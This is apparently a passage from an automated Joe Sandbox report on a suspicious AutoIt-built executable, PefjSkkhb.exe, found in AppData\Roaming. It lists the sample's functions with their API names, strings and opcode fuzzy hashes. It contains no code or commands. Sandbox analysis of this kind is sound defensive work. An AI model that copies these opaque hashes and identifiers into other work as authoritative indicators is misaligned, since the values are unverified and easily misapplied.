                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _ctrlfp
                                                                                • String ID:
                                                                                • API String ID: 697997973-0
                                                                                • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                • Instruction ID: d0c481821afd590a4600e857bc14997f155d0925dba4086cccf45e8a4476b2e2
                                                                                • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                • Instruction Fuzzy Hash: B7110B21D0C9C182D6B0FB39A0415FBE371EF9A780FA45231FB8946A99DF2ED5609B00
                                                                                Function 00007FF79F8ECF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2979156933-0
                                                                                • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                • Instruction ID: dffd6b1c85f097115d159fea37dc7d230337ed98d02dfcfdddf5bcaa1d9a03b1
                                                                                • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                • Instruction Fuzzy Hash: C721D432A0CBC186E720AB36B8802E6B791FB84BE4F844135E99D83B6DDF3CD0058750
                                                                                Function 00007FF79F91FA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                • String ID:
                                                                                • API String ID: 357397906-0
                                                                                • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                • Instruction ID: da0aca60fb1a85da9bf930f75caa141e07651f1bcf21ddeac0cca246f1c6a60b
                                                                                • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                • Instruction Fuzzy Hash: DA21F7B6A04B81DFEB10DF79D8441AC77B0F748B58B804826EA5897B1CEB78D654CB50
                                                                                Function 00007FF79F8E4B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                • String ID:
                                                                                • API String ID: 1352324309-0
                                                                                • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                • Instruction ID: b44901262dc9d9aeb2ba09fbd91f2fb601ddd3aac9ad7756b029681ffbfccb3d
                                                                                • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                • Instruction Fuzzy Hash: 3011826671858282E730AF75E4847E9B3A0FBC8B58FA54135C64D8F648CFBCD554EB20
                                                                                Function 00007FF79F8AB778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                • Opcode ID: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                • Instruction ID: 6a0b604ec0144dcee26b60f2462bce2beefe376f1d6927366093ccce517a92b9
                                                                                • Opcode Fuzzy Hash: 5c68b7f432a971f9c1a5a37c5612d4f4cb9c7d627adb850da760d9ecfffa7c81
                                                                                • Instruction Fuzzy Hash: C6018020F0B6C242FAF8B77595159FCA255EF447A0FD40538D91E467EADD6CE8209220
                                                                                Function 00007FF79F8E9260 Relevance: 6.0, APIs: 4, Instructions: 37sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                • String ID:
                                                                                • API String ID: 2875609808-0
                                                                                • Opcode ID: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                • Instruction ID: 309088d94f46689869482982890d94dbf01f6e33b4f9be0fb191ba21033638f8
                                                                                • Opcode Fuzzy Hash: c6a5989f9dc195674d757a8e27f3c1042de8158b51fda3090b6682196588991b
                                                                                • Instruction Fuzzy Hash: 7901D610A08BC682FA66773594406FEF360BF94761F854335E94F65564CF6CE4A58610
                                                                                Function 00007FF79F92072C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                • Instruction ID: ab7e2f2487d3f15419f86840c33a8bb38ffe26458eaceff24921ed96917b6b8d
                                                                                • Opcode Fuzzy Hash: 058f7c961f19f1df1cfb2125e1cbf4c754dffe1c4cdb6de871a3d3459fa768a6
                                                                                • Instruction Fuzzy Hash: 6701F535A187D142F7206B25BC087A8EB60BB81BA4F980130DE4943BB9CF7DD440CB50
                                                                                Function 00007FF79F8DD4EC Relevance: 6.0, APIs: 4, Instructions: 24threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                • Instruction ID: 2729a4959c99b8d0a8baca329dc27bd7155fb4a9608230eeaae20563b987e28c
                                                                                • Opcode Fuzzy Hash: 5cd93aab99a75fcfcb42631ab9fe43dfed1bd9e6d723e162398547d1910a1280
                                                                                • Instruction Fuzzy Hash: 11F0E522A5998682FB606F31EC04BFC63A0BF18FA4FC80034C80E86254DF3C9989C710
                                                                                Function 00007FF79F8D326E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                • Instruction ID: 802300fc093f13d3098c46048eb7dad35d0515851022b9ea21e95a635ba5d7c4
                                                                                • Opcode Fuzzy Hash: 1feedfad755e607c49e01145a3823af596c92df2e00356d80eed4a018d1c4b5c
                                                                                • Instruction Fuzzy Hash: 8CE01A21A0978286FA60EF729C0C6F8A354AF48FF1F814031CD0F4BB69EE3CA0059320
                                                                                Function 00007FF79F8D3287 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                • Instruction ID: 4a0008151c1ed8447504cfdfd80607ee2796e2629f636dddeb20ba624359164f
                                                                                • Opcode Fuzzy Hash: 0f8fd1d3423bd3015dfaeae2d2106595fe3726f148ce33332917fba087c4fcce
                                                                                • Instruction Fuzzy Hash: 58E04F21B0978286EA20EF719C0C1F8A354AF49FF1F814030CD0F4BB69EE3DA0059310
                                                                                Function 00007FF79F8ACC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: gfffffff
                                                                                • API String ID: 3215553584-1523873471
                                                                                • Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                • Instruction ID: f620ddb2b144c90a32b66096ea5bd7f00bee097ac22eb651f0017015ac642f92
                                                                                • Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
                                                                                • Instruction Fuzzy Hash: 3C914672B0A7CA86EBB19F3591447F8AB99EB267C0F448131CA9D07395DE3CE521E311
                                                                                Function 00007FF79F8E1D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                • Instruction ID: 3a8ce877e8562a3c22ff340b251626946ff5c106c5b84f10185e3ebf341eb272
                                                                                • Opcode Fuzzy Hash: ec532330f33b0a9812ac3d9e654419ff88b42a82dbb45e6ba561f09289b70eff
                                                                                • Instruction Fuzzy Hash: 93912636604B8286DB64EF29E4506ADB3A4FB88B98F918036DF8D83724DF3DD855D350
                                                                                Function 00007FF79F8AD0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: e+000$gfff
                                                                                • API String ID: 3215553584-3030954782
                                                                                • Opcode ID: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                • Instruction ID: 6e6f3fafbdffbf4f0a36ad1e160daca9834a5f03a1a3aac7d3d5f02ce3e99a8e
                                                                                • Opcode Fuzzy Hash: 04dcd116da85894f10939a0f3d563d07a18b7e7aec23bacfc76a5396d48b7619
                                                                                • Instruction Fuzzy Hash: C4515963B197C246E7B59F3599407A9EB91EB81B90F889231C79C87BD9CF2CE050C710
                                                                                Function 00007FF79F8AA09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                • API String ID: 3307058713-2476954778
                                                                                • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                • Instruction ID: 89a1befe7ce002abfd2cc20e549846c28a796dc36dc7812bc27c75f4dea7e398
                                                                                • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                                • Instruction Fuzzy Hash: 94419032A09B92D5EBA5AF3198404FDA3A4EF457A4F844035EE0E47B45DF3CE4659360
                                                                                Function 00007FF79F919E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 3467290483-2160076837
                                                                                • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                • Instruction ID: ec15bd17223e6f8322f8c68a556832341721038c8676af4ceb00598ae7e6c11a
                                                                                • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                • Instruction Fuzzy Hash: 3241FD32608AC28AD770EF25E4407EEB7A1FB847A1F504135EBE947A99DB3CD481DB50
                                                                                Function 00007FF79F905E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 2496851823-2422070025
                                                                                • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                • Instruction ID: d73c5d64b6b55f9ca4cb58fde9588ec8ad282a8b1e0719c2b4c561a57bd3f387
                                                                                • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                • Instruction Fuzzy Hash: 3831D022A0868291EB70EF32D9446FCA760FB54BA4F998531DE5E87399DF3CD546C310
                                                                                Function 00007FF79F91B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateMessageObjectSendStock
                                                                                • String ID: $SysTabControl32
                                                                                • API String ID: 2080134422-3143400907
                                                                                • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                • Instruction ID: 27fd972f97993377e098576bc9681677346245ca7e52fcbfbb4cbfb618ec47b8
                                                                                • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                • Instruction Fuzzy Hash: 21316932608BC18AE770DF25A84479AB7A1F784BB4F544335EAA907AD8CB38D4918F10
                                                                                Function 00007FF79F8ADC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: @
                                                                                • API String ID: 3000768030-2766056989
                                                                                • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                • Instruction ID: c75bdcc41960b2d30e7cde38de1f4d1a64056d4c4b863820d56b3f7681384ff0
